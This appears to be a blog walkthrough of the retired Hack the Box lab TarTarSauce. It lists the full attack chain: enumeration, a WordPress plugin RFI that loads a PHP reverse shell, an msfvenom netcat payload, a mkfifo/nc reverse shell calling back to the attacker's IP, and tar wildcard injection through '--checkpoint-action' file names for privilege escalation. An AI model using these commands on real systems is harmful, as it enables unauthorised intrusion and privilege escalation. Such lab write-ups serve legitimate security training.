Hack the Box: TarTarSauce Walkthrough

Today we are going to solve another CTF challenge “TarTarSauce”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of TarTarSauce is 10.10.10.88

Penetrating Methodology

§  Network scanning (Nmap)

§  Directory Enumeration (Drib)

§  Exploiting Wordpress against RFI Vulnerability

§  Spawning TTY shell

§  Check sudoers list permissions

§  Wildcard injection privilege escalation

§  Modify backup file to get root flag

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

nmap -A 10.10.10.88

From given below image, you can observe we found port 80 is open for http service and found robot.txt with 5 disallowed entries.

Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.

We don’t find anything on the webpage, so we run dirb to enumerate the directories. We find a directory called “/webservices/”. We further enumerate “/webservices/” as we don’t find anything in that directory.

dirb http://10.10.10.88

dirb http://10.10.10.88/webservices/

Dirb scan gave us the directory called “/webservices/wp/” that hosts a wordpress site.

We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).

We follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on kali Linux. We copy it to desktop and rename it to wp-load.php to execute our php shell using RFI. We start our python HTTP server to exploit RFI on the target machine.

python -m SimpleHTTPServer 80

We setup our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell. We go to “/home” directory and find a folder called “onuma”. We are unable to access “onuma” directory. So we spawn a tty shell using python to check the sudoers list.

python -c “import pty; pty.spawn(‘/bin/bash’)”

We check the sudoers list and find that we can run tar as user “onuma” without any password. Hence we can exploit wild card injection for privilege escalation.

sudo -l

We create an nc reverse shell using msfvenom.

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R

Now we move to the reverse shell and create a bash file using the nc command and save it as “wp.sh”.

Now tar has the ability to execute command using “--checkpoint-action”. So we created a file named “--checkpoint-action=exec=sh wp.sh” and “--checkpoint=1”.  So that we can execute our command as user onuma.

mkdir data

cd data

echo “mkfifo /tmp/cezbk; nc 10.10.14.177 4444 0

/tmp/cezbk 2>&1; rm /tmp/cezbk” > wp.sh

echo “” > “--checkpoint-action=exec=sh wp.sh”

echo “” > --checkpoint=1

sudo -u onuma /bin/tar cf archive.tar *

We use setup our listener using netcat, as soon as we run the tar command as user “onuma” we get our reverse shell as user “onuma”. Now we change the directory to /home/onuma and find the file called “user.txt” we take a look at the content of the file and find the 1^st flag. After finding the flag we spawn a tty shell using python.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Enumerating through the system we find a file a called a backuperer that has been symlinked to a file a named “backup” in “/usr/local/bin directory”.

We take a look at the content of the file and find that it is a file that creates a gzip archive of files inside “/var/www/html/”. It also checks the integrity of the file after 30 seconds from the creation of the file.

We use a script that takes the advantage of the “sleep” function of the script. As it waits for 30 seconds and then checks the integrity of the file we have 30 seconds to recreate the archive. We use this script here.  After running the script we find the root flag.